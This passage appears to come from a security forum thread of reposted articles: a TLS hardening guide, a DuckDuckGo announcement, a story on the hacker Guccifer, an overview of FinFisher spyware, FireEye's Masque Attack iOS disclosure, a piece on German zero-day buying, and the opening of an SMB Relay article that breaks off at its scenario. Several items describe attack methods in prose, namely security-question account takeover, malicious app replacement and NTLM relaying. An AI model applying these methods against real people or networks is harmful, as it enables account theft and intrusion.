Now that you have signed up and are the verified owner of example.com, you simply submit the example.com.csr file to request the generation of a certificate for your domain. The CA will sign your public key and the other information contained in the CSR with their private key, and you can finally download your certificate to example.com.crt. Upload the .crt and .key files to your web server. Be aware that any intermediate certificate in the CA's chain must be included in the .crt file as well; you can just cat them together. StartSSL's free tier has an intermediate Class 1 certificate; make sure to use the SHA-256 version of it. All files should be owned by root and must not be readable by anyone else. Configure your web server to use those and you should have a basic TLS configuration running out of the box. (Perfect) Forward Secrecy To properly deploy TLS you will want to provide (Perfect) Forward Secrecy. Without forward secrecy TLS still seems to secure your communication today; it might however not once your private key is compromised in the future. If a powerful adversary (think NSA) records all communication between a visitor and your server, they can decrypt all this traffic years later by stealing your private key or going the "legal" way to obtain it. This can be prevented by using short-lived (ephemeral) keys for key exchanges that the server will throw away after a short period. Diffie-Hellman key exchanges Using RSA with your certificate's private and public keys for key exchanges is off the table, as generating a 2048+ bit prime is very expensive. We thus need to switch to ephemeral (Elliptic Curve) Diffie-Hellman cipher suites. For DH you can generate a 2048 bit parameter once; choosing a private key afterwards is cheap. openssl dhparam -out dhparam.pem 2048 Simply upload dhparam.pem to your server and instruct the web server to use it for Diffie-Hellman key exchanges. When using ECDH the predefined elliptic curve represents this parameter and no further action is needed. (Nginx) ssl_dhparam /path/to/ssl/dhparam.pem; Apache unfortunately does not support custom DH parameters; the size is always set to 1024 bit and is not user-configurable. This will hopefully be fixed in future versions. Session IDs One of the most important mechanisms to improve TLS performance is Session Resumption. In a full handshake the server sends a Session ID as part of the "hello" message. On a subsequent connection the client can use this session ID and pass it to the server when connecting. Because both the server and the client have saved the last session's "secret state" under the session ID, they can simply resume the TLS session where they left off. Now you might notice that this could violate forward secrecy, as a compromised server might reveal the secret state for all session IDs if the cache is just large enough. The forward secrecy of a connection is thus bounded by how long the session information is retained on the server. Ideally, your server would use a medium-sized in-memory cache that is purged daily. Apache lets you configure that using the SSLSessionCache directive, and you should use the high-performance cyclic buffer shmcb. Nginx has the ssl_session_cache directive, and you should use a cache that is shared between workers. The right size of those caches depends on the amount of traffic your server handles. You want browsers to resume TLS sessions but also to get rid of old ones about daily. Session Tickets The second mechanism to resume a TLS session is Session Tickets.
This extension transmits the server's secret state to the client, encrypted with a key only known to the server. That ticket key is protecting the TLS connection now and in the future, and this might as well violate forward secrecy if the key used to encrypt session tickets is compromised. The ticket (just as the session cache) contains all of the server's secret state and would allow an attacker to reveal the whole conversation. Nginx and Apache by default generate a session ticket key at startup and unfortunately provide no way to rotate it. If your server is running for months without a restart, then you will use that same session ticket key for months, and breaking into your server could reveal every recorded TLS conversation since the web server was started. Neither Nginx nor Apache has a sane way to work around this. Nginx might be able to rotate the key by reloading the server config, which is rather easy to implement with a cron job; make sure to test that this actually works before relying on it though. Thus, if you really want to provide forward secrecy you should disable session tickets, using ssl_session_tickets off for Nginx and SSLOpenSSLConfCmd Options -SessionTicket for Apache. Choosing the right cipher suites Mozilla's guide on server side TLS provides a great list of modern cipher suites that needs to be put in your web server's configuration. The combinations below are unfortunately supported only by modern browsers; for broader client support you might want to consider using the "intermediate" list. ECDHE-RSA-AES128-GCM-SHA256: \ ECDHE-ECDSA-AES128-GCM-SHA256: \ ECDHE-RSA-AES256-GCM-SHA384: \ ECDHE-ECDSA-AES256-GCM-SHA384: \ DHE-RSA-AES128-GCM-SHA256: \ DHE-DSS-AES128-GCM-SHA256: \ [...] !aNULL:!eNULL:!EXPORT:!DES:!RC4:!3DES:!MD5:!PSK All these cipher suites start with (EC)DHE, which means they only support ephemeral Diffie-Hellman key exchanges for forward secrecy. The last line discards non-authenticated key exchanges, null-encryption (cleartext), legacy weak ciphers marked exportable by US law, weak ciphers (3)DES and RC4, weak MD5 signatures, and pre-shared keys. Note: To ensure that the order of cipher suites is respected you need to set ssl_prefer_server_ciphers on for Nginx or SSLHonorCipherOrder on for Apache. HTTP Strict Transport Security (HSTS) Now that your server is configured to accept TLS connections, you still want to support HTTP connections on port 80 to redirect old links and folks typing example.com in the URL bar to your shiny new HTTPS site. At this point however a Man-In-The-Middle (or Woman-In-The-Middle) attack can easily intercept and modify traffic to deliver a forged HTTP version of your site to a visitor. The poor visitor might never know, because they did not realize you offer TLS connections now. To ensure your users are protected the next time they visit your site, you want to send an HSTS header to enforce strict transport security. By sending this header the browser will not try to establish an HTTP connection next time, but will directly connect to your website via TLS. Strict-Transport-Security: max-age=15768000; includeSubDomains; preload Sending these headers over an HTTPS connection (they will be ignored via HTTP) lets the browser remember that this domain wants strict transport security for the next six months (~15768000 seconds). The includeSubDomains token enforces TLS connections for every subdomain of your domain, and the non-standard preload token will be required for the next section.
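Once the header is in place, it is worth verifying what your server actually sends. Below is a minimal check using only the Python standard library; the hostname is a placeholder for your own domain.

import http.client

# Connect to the site and inspect the HSTS header it returns.
conn = http.client.HTTPSConnection("example.com")  # replace with your host
conn.request("HEAD", "/")
response = conn.getresponse()
print(response.getheader("Strict-Transport-Security"))
# With the configuration above this should print:
#   max-age=15768000; includeSubDomains; preload
conn.close()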
HSTS Preload List If, after deploying TLS, the very first connection of a visitor is genuine, we are fine. Your server will send the HSTS header over TLS and the visitor's browser remembers to use TLS in the future. The very first connection, and every connection after the HSTS header expires, are however still vulnerable to a {M,W}ITM attack. To prevent this, Firefox and Chrome share an HSTS Preload List that basically includes HSTS headers for all sites that would send that header when visited anyway. So before connecting to a host, Firefox and Chrome check whether that domain is in the list, and if so will not even try using an insecure HTTP connection. Including your page in that list is easy: just submit your domain using the HSTS Preload List submission form. Your HSTS header must be set up correctly and contain the includeSubDomains and preload tokens to be accepted. OCSP Stapling OCSP - using an external server provided by the CA to check whether the certificate given by the server was revoked - might sound like a great idea at first. On second thought, it actually sounds rather terrible. First, the CA providing the OCSP server suddenly has to be able to handle a lot of requests: every client opening a connection to your server will want to know whether your certificate was revoked before talking to you. Second, the browser contacting a CA and passing along the certificate is an easy way to monitor a user's browsing behavior. If all CAs worked together they probably could come up with a nice data set of TLS sites that people visit, when, and in what order (not that I know of any plans that they actually want to do that). Let the server do the work for your visitors OCSP Stapling is a TLS extension that enables the server to query its certificate's revocation status at regular intervals in the background and send an OCSP response with the TLS handshake. The stapled response itself cannot be faked, as it needs to be signed with the CA's private key. Enabling OCSP stapling thus improves performance and privacy for your visitors immediately. You need to create a certificate file that contains your CA's root certificate prepended by any intermediate certificates that might be in your CA's chain. StartSSL has an intermediate certificate for Class 1 (the free tier); make sure to use the one with the SHA-256 signature. Pass the file to Nginx using the ssl_trusted_certificate directive and to Apache using the SSLCACertificateFile directive. OCSP Must Staple OCSP is however unfortunately not a silver bullet. If a browser does not know in advance that it will receive a stapled response, then the attacker might as well redirect HTTPS traffic to their server and block any traffic to the OCSP server (in which case browsers soft-fail). Adam Langley explains all possible attack vectors in great detail. One solution might be the proposed OCSP Must Staple extension. This would add another field to the certificate issued by the CA that says a server must provide a stapled OCSP response. The problem here is that the proposal expired, and in practice it would take years for CAs to support it. Another solution would be to implement a header similar to HSTS that lets the browser remember to require a stapled OCSP response when connecting next time. This however has the same problems on first connection as HSTS, and we might have to maintain an "OCSP-Must-Staple Preload List". As of today there is unfortunately no immediate solution in sight.
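As an aside, it may help to see roughly what the OCSP query a client (or a stapling web server) assembles looks like. Here is a sketch using the pyca/cryptography package; this assumes a recent version (the ocsp module appeared around release 2.4), and the file names are placeholders.

from cryptography import x509
from cryptography.x509 import ocsp
from cryptography.hazmat.primitives import hashes, serialization

# Load the server certificate and the certificate of its issuer.
with open("example.com.crt", "rb") as f:
    cert = x509.load_pem_x509_certificate(f.read())
with open("intermediate.crt", "rb") as f:
    issuer = x509.load_pem_x509_certificate(f.read())

# Build a request identifying the certificate to the OCSP responder.
builder = ocsp.OCSPRequestBuilder().add_certificate(cert, issuer, hashes.SHA1())
request = builder.build()

# The DER-encoded request is sent to the OCSP responder URL listed in the
# certificate's Authority Information Access extension.
print(len(request.public_bytes(serialization.Encoding.DER)), "byte OCSP request")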
HTTP Public Key Pinning (HPKP) Even with all those security checks when receiving the server's certificate, you would still be completely out of luck in case your CA's private key is compromised or your CA simply fucks up. We can prevent these kinds of attacks with an HTTP extension called Public Key Pinning. Key pinning is a trust-on-first-use (TOFU) mechanism. The first time a browser connects to a host it lacks the information necessary to perform "pin validation", so it will not be able to detect and thwart a {M,W}ITM attack. This feature only allows detection of these kinds of attacks after the first connection. Generating an HPKP header Creating an HPKP header is easy: all you need to do is compute the base64-encoded "SPKI fingerprint" of your server's certificate. An SPKI fingerprint is the output of applying SHA-256 to the public key information contained in your certificate. openssl req -inform pem -pubkey -noout < example.com.csr | openssl pkey -pubin -outform der | openssl dgst -sha256 -binary | base64 The result of running the above command can be directly used as the pin-sha256 value for the Public-Key-Pins header as shown below (a Python equivalent of this pipeline is sketched at the end of this post): Public-Key-Pins: pin-sha256="GRAH5Ex+kB4cCQi5gMU82urf+6kEgbVtzfCSkw55AGk="; pin-sha256="lERGk61FITjzyKHcJ89xpc6aDwtRkOPAU0jdnUqzW2s="; max-age=15768000; includeSubDomains Upon receiving this header the browser knows that it has to store the pins given by the header and discard any certificates whose SPKI fingerprints do not match for the next six months (max-age=15768000). We specified the includeSubDomains token, so the browser will verify pins when connecting to any subdomain. Include the pin of a backup key It is considered good practice to include at least a second pin, the SPKI fingerprint of a backup RSA key that you can generate exactly as the original one: openssl req -new -newkey rsa:4096 -nodes -sha256 \ -keyout example.com.backup.key -out example.com.backup.csr In case your private key is compromised you might need to revoke your current certificate and request the CA to issue a new one. The old pin however would still be stored in browsers for six months, which means they would not be able to connect to your site. By sending two pin-sha256 values, the browser will later accept a TLS connection when any of the stored fingerprints match the given certificate. Known attacks In the past years (and especially the last year) a few attacks on SSL/TLS were published. Some of those attacks can be worked around on the protocol or crypto library level, so that you basically do not have to worry as long as your web server is up to date and the visitor is using a modern browser. A few attacks however need to be thwarted by configuring your server properly. BEAST (Browser Exploit Against SSL/TLS) BEAST is an attack that only affects TLSv1.0. Exploiting this vulnerability is possible but rather difficult. You can either disable TLSv1.0 completely - which is certainly the preferred solution, although you might neglect folks with old browsers on old operating systems - or you can just not worry. All major browsers have implemented workarounds, so that it should not be an issue anymore in practice. BREACH (Browser Reconnaissance and Exfiltration via Adaptive Compression of Hypertext) BREACH is a security exploit against HTTPS when using HTTP compression.
BREACH is based on CRIME but, unlike CRIME - which can be successfully defended against by turning off TLS compression (the default for Nginx and Apache nowadays) - BREACH can only be prevented by turning off HTTP compression. Another method to mitigate this would be to use cross-site request forgery (CSRF) protection or to disable HTTP compression selectively based on headers sent by the application. POODLE (Padding Oracle On Downgraded Legacy Encryption) POODLE is yet another padding oracle attack on TLS. Luckily it only affects the predecessor of TLS, which is SSLv3. The only solution when deploying a new server is to just disable SSLv3 completely. Fortunately, we already excluded SSLv3 in our list of preferred ciphers previously. Firefox 34 will ship with SSLv3 disabled by default; Chrome and others will hopefully follow soon. Further reading Thanks for reading, and I am really glad you made it that far! I hope this post did not discourage you from deploying TLS - after all, getting your setup right is the most important thing. And it certainly is better to know what you are getting yourselves into than to leave your visitors unprotected. If you want to read even more about setting up TLS, the Mozilla Wiki page on Server-Side TLS has more information and proposed web server configurations. Thanks a lot to Frederik Braun for taking the time to proof-read this post and helping to clarify a few things! Sursa: https://timtaubert.de/blog/2014/10/deploying-tls-the-hard-way/
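Coming back to the HPKP section above: the SPKI fingerprint from the openssl pipeline can also be computed in Python, which is handy if you want to script pin generation. A minimal sketch using pyca/cryptography, reading the public key out of the issued certificate instead of the CSR (the resulting pin is the same); the file name is a placeholder.

import base64
import hashlib

from cryptography import x509
from cryptography.hazmat.primitives import serialization

# Extract the DER-encoded SubjectPublicKeyInfo from the certificate.
with open("example.com.crt", "rb") as f:
    cert = x509.load_pem_x509_certificate(f.read())
spki = cert.public_key().public_bytes(
    serialization.Encoding.DER,
    serialization.PublicFormat.SubjectPublicKeyInfo,
)

# The pin is the base64 of the SHA-256 digest of the SPKI structure.
pin = base64.b64encode(hashlib.sha256(spki).digest()).decode()
print('pin-sha256="%s"' % pin)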
  17. [h=2]DuckDuckGo in Firefox[/h]9 hours and 6 minutes ago posted by yegg Staff We're excited to announce that DuckDuckGo is now included as a pre-installed search option in Firefox! Today is Firefox's 10th anniversary and with it comes a special release that includes DuckDuckGo. The DuckDuckGo and Firefox communities have always had a shared interest in privacy so we're very proud to be included and can't wait to see what we can accomplish! To use DuckDuckGo in Firefox, simply download the latest version and select us from the search dropdown: Sursa: https://duck.co/blog/firefox
  18. "Micul Fum" ("Little Smoke") and the big stroke of luck. How Guccifer managed to break into Corina Crețu's account and strike fear into the Bush family 11 November 2014, 16:12, by Octavian Palade The Romanian hacker Guccifer became known after scaring several celebrities and names in Romanian and international politics. He is now behind bars, where he was interviewed by reporters from the "New York Times". In an article titled "For Guccifer, Hacking Was Easy. Prison Is Hard.", Marcel-Lehel Lazăr, the man behind the Guccifer pseudonym, told his story. He was caught on January 22 this year, after managing to fool FBI agents for two years. "I was expecting them, but the shock was still very great for me. It's hard to be a hacker, but it's even harder to cover all your tracks," Guccifer told the "New York Times" from the Arad penitentiary. He has a seven-year sentence to serve. Before becoming Guccifer, a name that comes from "the style of Gucci and the light of Lucifer", Marcel was a taxi driver. The 47-year-old had been unemployed for several years and had neither technical knowledge nor sophisticated equipment. From behind a worn-out computer, Marcel quickly learned a new trade. In many ways, he showed everyone how easy it is to be a criminal on the Internet and how you can stay a step ahead of law enforcement with only rudimentary knowledge. "He wasn't really a hacker, just a very clever, very patient and very persistent guy," said Viorel Badea, the prosecutor who handled the case. Guccifer is known for publishing a series of self-portraits painted by former US president George W. Bush, for exposing the "flirtation" between Corina Crețu, a member of the European Parliament, and Colin Powell, and for obtaining numerous private photos and messages belonging to national and international celebrities. "This is just a poor Romanian who wanted to be famous," Badea added. Lazăr managed to break into all those accounts by guessing each target's passwords. Instead of using sophisticated viruses or other tools typical of cybercriminals, he searched the Internet for as much information as possible about his targets, information he then used to answer the security questions needed to recover a password. Cracking Corina Crețu's password took him six months of effort. The "trick" was not new to the man from Arad. Lazăr had already served prison time in 2011 after accessing, in the same way, under the pseudonym "Micul Fum" ("Little Smoke"), the personal accounts of local celebrities such as Bianca Drăgușanu, Laura Cosoi, Corina Caragea and Dragoș Moștenescu. Despite the 2011 conviction, Guccifer was arrogant and believed he would never be caught. On June 6, 2013, he started bragging on the website of the American publication "The Smoking Gun", leaving a comment in broken English. "I am not worried. I think I will change proxies, play backgammon on Yahoo, watch TV and play with my daughter and the rest of my family," he wrote. A day later, however, an announcement by SRI chief George Maior put him on edge. Maior declared that he would soon capture "Little Guccifer". Lazăr believed the Romanian authorities had made the connection between "Micul Fum" and "Guccifer", so he started smashing his computer components to pieces in a desperate attempt to cover his tracks. Maior later said that, at the time he made the announcement, he did not know that
the hacker had been caught before, and admitted that he was merely trying to downplay his importance. What, then, was the reason Guccifer acted the way he did? He did not steal any money and did not try to blackmail anyone. It appears to be a large dose of paranoia. "The world is run by a group of conspirators called the Illuminati Council, made up of very rich people, noble families, bankers," he argued in a handwritten manifesto he read to reporters. He said he had no interest in breaking into celebrities' accounts; he just happened to stumble upon them while trying to pry into the private lives of other people. Now, Guccifer shares a cell with four other people and has no access to a computer. He writes all his thoughts and conspiracy theories by hand in a small notebook. "I broke the law, but to serve seven years in a maximum-security prison? I am not a criminal or a thief. What I did was right," he also said. Sursa: „Micul Fum" și marele noroc. Cum a reușit Guccifer să spargă contul Corinei Crețu și să bage spaima în familia Bush | adevarul.ro
  19. Inside FinFisher: examining the intrusive toolset On November 10, 2014 | Posted by Sohail Abid In Blog With tags Finfisher FinFisher, a company known for making and selling a wide range of spy software to world governments for large sums of money, was hacked in the first week of August this year. The anonymous hackers leaked a 40GB torrent including the entire FinFisher support portal with obfuscated information about the buyers, the list of software they had purchased, the duration of each license, and their communication with the support staff. The leak helped human rights activists around the world identify the buyers, hold their governments to account for the purchases, and question the necessity of such a measure. Digital Rights Foundation also released a report detailing the evidence of Pakistan's purchase of three software packages from FinFisher. The leak generated a lot of buzz, and rightly so. But the coverage from mainstream media and human rights organizations was primarily limited to reporting the leak, identifying the buyers, and potential human rights implications. There hasn't been in-depth coverage of the scope and capabilities of the whole set of software FinFisher sells. That is what we intend to do in this article. Understanding FinFisher FinFisher is not just a piece of software. It's a well-thought-out and sophisticated toolset, comprising both software and hardware, built from the ground up to gain access to people's private data and communications. Well thought out in the sense that each tool complements the others in breaking into someone's communication, and sophisticated in the way the tools are generally invisible to the person. An overview of the FinFisher toolset. At the time of the leak, FinFisher had 12 products available on its website: ten hardware+software solutions to break into computers and mobiles, a repository of 0-day and 1-day exploits that can be used to infect the target systems, and a training program. Among these solutions, FinSpy is the jewel of the crown. It is a remote monitoring solution that essentially lets the buyer see everything someone does on their computer. How Do They Break In It is easier if they, or anyone they know, have access to the computer. FinFisher offers three solutions for this situation. Two of them (FinUSB Suite and FinFly USB) involve attaching a USB drive to the computer; it does not matter if the computer is shut down or logged in, password protected or not. Once the USB is attached, the system becomes compromised. The third (FinFireWire) is a set of adapter cards (FireWire/1394, PCMCIA and ExpressCard) and associated cables that, when attached, give access to a running but password-protected Mac, Windows, or Linux computer. Four FinFisher solutions are designed for situations when they don't have physical access to someone's computer. FinFly Net consists of a small portable computer that is attached to the router of a hotel, airport or any other "friendly" place, and a management laptop. Once the FinFly Net computer is in place, the management laptop can see the internet traffic being sent and received by the people attached to the network. It can also display a fake software upgrade notification to the target which, when installed, gives complete access to that computer.
Since this solution sits between all internet traffic going to and from the people connected to the network, it is also capable of inserting a software update (Adobe Flash, for example) notification on a legitimate website. FinFly LAN can also attach spying software to legitimate files on-the-fly, while being on the same wired or wireless network. FinFly Web creates fake websites which exploit loopholes in web browsers to instantly install FinSpy, the crown jewel of the FinFisher toolset. FinFly ISP is a hardware solution deployed at an ISP to covertly install spy software on any computer in a city or country. This solution is able to "patch" any legitimate files being downloaded by people with spying software. Like FinFly Net, it can also issue fake upgrade notifications for popular software like iTunes. The computer becomes compromised as soon as the downloaded files are run or the software upgrade is applied. FinIntrusion Kit is an advanced toolkit that includes a customized Linux laptop with a host of adapters and antennas and can break WEP and WPA/WPA2 passphrases. What Can They See A lot. But let's go through it step by step. IN CASE OF PHYSICAL ACCESS The FinUSB toolkit can extract login credentials from common programs like email clients, chat messengers, and remote desktop tools. It can also silently copy recently opened, created, or edited files from the computer, as well as browsing history, chat logs, and wifi passwords. FinFireWire, after bypassing the login or lock screen, can recover passwords from RAM and copy all files onto an external drive. IN CASE OF CLOSE PROXIMITY, LIKE AIRPORTS AND HOTELS FinIntrusion Kit, which only requires the target to be on the same network, such as at an airport or hotel, can capture usernames and passwords being entered on websites, in addition to any other internet traffic, even if it's over HTTPS. FinFly Net and FinFly LAN lead to the installation of FinSpy, which then gives full access to all data and communications on a system. IN CASE OF NO PHYSICAL ACCESS OR PROXIMITY FinFisher provides FinFly ISP and FinFly Web to infect people who are not in close proximity. Once infected, full access to these computers is granted. A video detailing how FinFly ISP works FinSpy: Jewel of the Crown Marketed as a 'remote monitoring solution,' FinSpy is the multi-purpose spying software around which the whole company revolves. It opens a backdoor to the infected computer, allowing live access to all files and data. It also enables access to the mic and webcam installed on the computer for "live surveillance." It can save an audio or video recording of each Skype call and send it to the buyer. And it can, FinFisher flaunts, "bypass almost 40 regularly tested antivirus systems." FinSpy Control Center. Note the area in red: those are the actions that can be taken on an infected computer. We have a saying in Punjabi to seek refuge from something terrible: May this not happen even to my enemy. I'll end this post at that. About the author: Sohail Abid researches surveillance and censorship issues at Digital Rights Foundation. Before joining DRF, he was CTO at Jumpshare, a file sharing startup from Pakistan. Sursa: Inside FinFisher: examining the intrusive toolset | Digital Rights Foundation
  20. [h=2]Masque Attack: All Your iOS Apps Belong to Us[/h] November 10, 2014 | By Hui Xue, Tao Wei and Yulong Zhang | Exploits, Mobile Threats, Targeted Attack, Threat Intelligence, Threat Research, Vulnerabilities In July 2014, FireEye mobile security researchers discovered that an iOS app installed using enterprise/ad-hoc provisioning could replace another genuine app installed through the App Store, as long as both apps use the same bundle identifier. This in-house app may display an arbitrary title (like "New Flappy Bird") that lures the user to install it, but the app can replace another genuine app after installation. All apps can be replaced except iOS preinstalled apps, such as Mobile Safari. This vulnerability exists because iOS doesn't enforce matching certificates for apps with the same bundle identifier. We verified this vulnerability on iOS 7.1.1, 7.1.2, 8.0, 8.1 and 8.1.1 beta, for both jailbroken and non-jailbroken devices. An attacker can leverage this vulnerability both through wireless networks and through USB. We named this attack "Masque Attack" and have created a demo video here: We notified Apple about this vulnerability on July 26. Recently Claud Xiao discovered the "WireLurker" malware. After looking into WireLurker, we found that it started to utilize a limited form of Masque Attack to attack iOS devices through USB. Masque Attacks can pose much bigger threats than WireLurker. Masque Attacks can replace authentic apps, such as banking and email apps, with the attacker's malware delivered through the Internet. That means the attacker can steal a user's banking credentials by replacing an authentic banking app with malware that has an identical UI. Surprisingly, the malware can even access the original app's local data, which wasn't removed when the original app was replaced. This data may contain cached emails, or even login tokens which the malware can use to log into the user's account directly. We have seen proof that this issue has started to circulate. In this situation, we consider it urgent to let the public know, since there could be existing attacks that haven't been found by security vendors. We are also sharing mitigation measures to help iOS users better protect themselves. [h=2]Security Impacts[/h] By leveraging Masque Attack, an attacker can lure a victim into installing an app with a deceiving name crafted by the attacker (like "New Angry Bird"), and the iOS system will use it to replace a legitimate app with the same bundle identifier. Masque Attack couldn't replace Apple's own platform apps such as Mobile Safari, but it can replace apps installed from the App Store. Masque Attack has severe security consequences:
- Attackers could mimic the original app's login interface to steal the victim's login credentials. We have confirmed this through multiple email and banking apps, where the malware uses a UI identical to the original app to trick the user into entering real login credentials and upload them to a remote server.
- We also found that data under the original app's directory, such as local data caches, remained in the malware's local directory after the original app was replaced. The malware can steal this sensitive data. We have confirmed this attack with email apps, where the malware can steal local caches of important emails and upload them to a remote server.
- The MDM interface couldn't distinguish the malware from the original app, because they used the same bundle identifier. Currently there is no MDM API to get the certificate information for each app.
Thus, it is difficult for MDM to detect such attacks. As mentioned in our Virus Bulletin 2014 paper "Apple without a shell - iOS under targeted attack", apps distributed using enterprise provisioning profiles (which we call "EnPublic apps") aren't subjected to Apple's review process. Therefore, the attacker can leverage iOS private APIs for powerful attacks such as background monitoring (CVE-2014-1276) and mimicking iCloud's UI to steal the user's Apple ID and password. The attacker can also use Masque Attacks to bypass the normal app sandbox and then get root privileges by attacking known iOS vulnerabilities, such as the ones used by the Pangu team. [h=2]An Example[/h] In one of our experiments, we used an in-house app with the bundle identifier "com.google.Gmail" and the title "New Flappy Bird". We signed this app using an enterprise certificate. When we installed this app from a website, it replaced the original Gmail app on the phone. Figure 1 Figure 1 illustrates this process. Figures 1(a) and 1(b) show the genuine Gmail app installed on the device with 22 unread emails. Figure 1(c) shows that the victim was lured to install an in-house app called "New Flappy Bird" from a website. Note that "New Flappy Bird" is the title for this app and the attacker can set it to an arbitrary value when preparing the app. However, this app has the bundle identifier "com.google.Gmail". After the victim clicks "Install", Figure 1(d) shows the in-house app replacing the original Gmail app during the installation. Figure 1(e) shows that the original Gmail app was replaced by the in-house app. After installation, when opening the new "Gmail" app, the user is automatically logged in with almost the same UI, except for a small text box at the top saying "yes, you are pwned", which we designed to easily illustrate the attack. Attackers won't show such courtesy in real-world attacks. Meanwhile, the original authentic Gmail app's locally cached emails, which were stored in clear text in a sqlite3 database as shown in Figure 2, are uploaded to a remote server. Note that the Masque Attack happens completely over the wireless network, without relying on connecting the device to a computer. Figure 2 [h=2]Mitigations[/h] iOS users can protect themselves from Masque Attacks by following three steps:
- Don't install apps from third-party sources other than Apple's official App Store or the user's own organization
- Don't click "Install" on a pop-up from a third-party web page, as shown in Figure 1(c), no matter what the pop-up says about the app. The pop-up can show attractive app titles crafted by the attacker
- When opening an app, if iOS shows an alert with "Untrusted App Developer", as shown in Figure 3, click on "Don't Trust" and uninstall the app immediately
Figure 3 To check whether there are apps already installed through Masque Attacks, iOS 7 users can check the enterprise provisioning profiles installed on their iOS devices, which indicate the signing identities of possible malware delivered by Masque Attacks, by checking "Settings -> General -> Profiles" for "PROVISIONING PROFILES". iOS 7 users can report suspicious provisioning profiles to their security department. Deleting a provisioning profile will prevent enterprise-signed apps which rely on that specific profile from running. However, iOS 8 devices don't show provisioning profiles already installed on the devices, and we suggest taking extra caution when installing apps. We disclosed this vulnerability to Apple in July.
Because all the existing standard protections or interfaces by Apple cannot prevent such an attack, we are asking Apple to provide more powerful interfaces to professional security vendors to protect enterprise users from these and other advanced attacks. We thank FireEye team members Noah Johnson and Andrew Osheroff for their help in producing the demo video. We also want to thank Kyrksen Storer and Lynn Thorne for their help improving this blog. Special thanks to Zheng Bu for his valuable comments and feedback. This entry was posted in Exploits, Mobile Threats, Targeted Attack, Threat Intelligence, Threat Research, Vulnerabilities and tagged iOS Vulnerability, Masque Attack, WireLurker by Hui Xue, Tao Wei and Yulong Zhang. Sursa: Masque Attack: All Your iOS Apps Belong to Us | FireEye Blog
  21. German spies want millions of Euros to buy zero-day code holes Because once we own them, nobody else can ... oh, wait By Richard Chirgwin, 11 Nov 2014 Germany's spooks have come under fire for reportedly seeking funds to find bugs – not to fix them, but to hoard them. According to The Süddeutsche Zeitung, the country's BND – its federal intelligence service – wants €300 million in funding for what it calls the Strategic Technical Initiative. The Local says €4.5 million of that will be spent seeking bugs in SSL and HTTPS. The BND is shopping for zero-day bugs not to fix them, but to exploit them, the report claims, and that's drawn criticism from NGOs, the Pirate Party, and the Chaos Computer Club (CCC). German Pirate Party president Stefan Körner told The Local people should fear governments more than cyber-terror. Körner is also critical of the strategy on the basis that governments shouldn't be helping fund the grey market for security vulnerabilities, a sentiment echoed by the CCC. The CCC's Dirk Engling called the proposal legally questionable and damaging to the German economy. The SZ report also points out the serious risk that a zero-day bought on the black market will also be available for purchase by criminals for exploitation. The BND proposal would seem to put it at odds with America's NSA, which put its hand on its heart last week and promised that it shares "most" of the bugs it finds so they can be fixed. (The Register can't help but wonder if a partner agency hoarding bugs would be resisted by the NSA, or if it provides an escape clause to the promise to share bugs). The BND also wants to spend €1.1 million to set up a honey-pot, and is in the early stages of conducting social network analysis, with a prototype program slated for completion by June 2015. ® Sursa: German spies want millions of Euros to buy zero-day code holes • The Register
  22. There's also XenForo, but I don't know very much about it.
  23. SMB Relay Demystified and NTLMv2 Pwnage with Python Posted by eskoudis Filed under Metasploit, Methodology, Passwords, Python By Mark Baggett [Editor's Note: In this _excellent_ article, Mark Baggett explains in detail how the very powerful SMBRelay attack works and offers tips for how penetration testers can operationalize around it. And, better yet, about 2/3rds of the way in, Mark shows how you can use a Python module to perform these attacks in an environment that uses only NTLMv2, a more secure Windows authentication mechanism. Really good stuff! --Ed.] The SMB Relay attack is one of those awesome tactics that really helps penetration testers demonstrate significant risk in a target organization; it is reliable, effective, and almost always works. Even when the organization has good patch management practices, the SMB Relay attack can still get you access to critical assets. Most networks have several automated systems that connect to all the hosts on the network to perform various management tasks. For example, software inventory systems, antivirus updates, nightly backups, software updates and patch management, desktop backups, event log collectors, and other processes will routinely connect to every host on the network, log in with administrative credentials and perform some management function. In some organizations, active defense systems such as Antivirus Rogue host detection will immediately attempt to log in to any host that shows up on the network. These systems will typically try long lists of administrative usernames and passwords as they try to gain access to the unknown host that has mysteriously appeared on the network. SMB Relay attacks allow us to grab these authentication attempts and use them to access systems on the network. In a way, SMB Relays are the network version of Pass the Hash attacks (which Ed Skoudis described briefly in the context of psexec in his Pen Tester's Pledge article). Let's look at how these attacks work. NTLM is a challenge/response protocol. The authentication happens something like this: First, the client attempts to log in and the server responds with a challenge. In effect the server says, "If you are who you say you are, then encrypt this thing (Challenge X) with your hash." Next, the client encrypts the challenge and sends back the encrypted challenge response. The server then attempts to decrypt that encrypted challenge response with the user's password hash. If it decrypts to reveal the challenge that it sent, then the user is authenticated. Here is an illustration of a challenge/response authentication. With SMB Relay attacks, the attacker inserts himself into the middle of that exchange. The attacker selects the target server he wants to authenticate to and then the attacker waits for someone on the network to authenticate to his machine. This is where rogue host detection, vulnerability scanners, and administrator scripts that automatically authenticate to hosts become a penetration tester's best friends. When the automated process connects to the attacker, he passes the authentication attempt off to his target (another system on the network, perhaps a server). The target generates a challenge and sends it back to the attacker. The attacker sends the challenge back to the originating scanning system. The scanning system encrypts the challenge with the correct password hash and sends it to the attacker. The attacker passes the correctly encrypted response back to his target and successfully authenticates.
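To see why relaying works the same way regardless of NTLM version, it helps to look at what the client actually computes. Below is a rough sketch of the NTLMv2 response following the MS-NLMP specification; the construction of the client "blob" (timestamp, client nonce, target info) is omitted, and MD4 availability depends on your OpenSSL build.

import hashlib
import hmac

def nt_hash(password):
    # The NT hash is MD4 over the UTF-16LE encoded password.
    return hashlib.new("md4", password.encode("utf-16le")).digest()

def ntlmv2_response(password, user, domain, server_challenge, blob):
    # Per MS-NLMP, the NTLMv2 key is HMAC-MD5 over the uppercased
    # username concatenated with the domain, keyed with the NT hash.
    key = hmac.new(nt_hash(password),
                   (user.upper() + domain).encode("utf-16le"),
                   hashlib.md5).digest()
    # The response is HMAC-MD5 over the server challenge plus the blob.
    return hmac.new(key, server_challenge + blob, hashlib.md5).digest()

Note that the relay attacker never computes any of this; he simply shuttles the opaque challenge and response between victim and target, which is why moving to NTLMv2 alone does not stop relaying (SMB signing does).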
The relay process is shown in the next illustration. The BLUE arrows are the original communications and the RED arrows are slightly modified versions of those communications that the attacker is relaying to his target, so that he can gain access to it. Although this may seem complicated, it is actually very easy to exploit. In this example, the attacker (let's say he's at IP address 10.10.12.10) wants to gain access to the server at the IP address 10.10.12.20 (perhaps a juicy file server). There is a nightly software inventory process on the server at 10.10.12.19 that inventories all the hosts on the network. Scenario:
- Attacker IP - 10.10.12.10
- Target IP - 10.10.12.20
- Nightly Inventory Scanner IP - 10.10.12.19
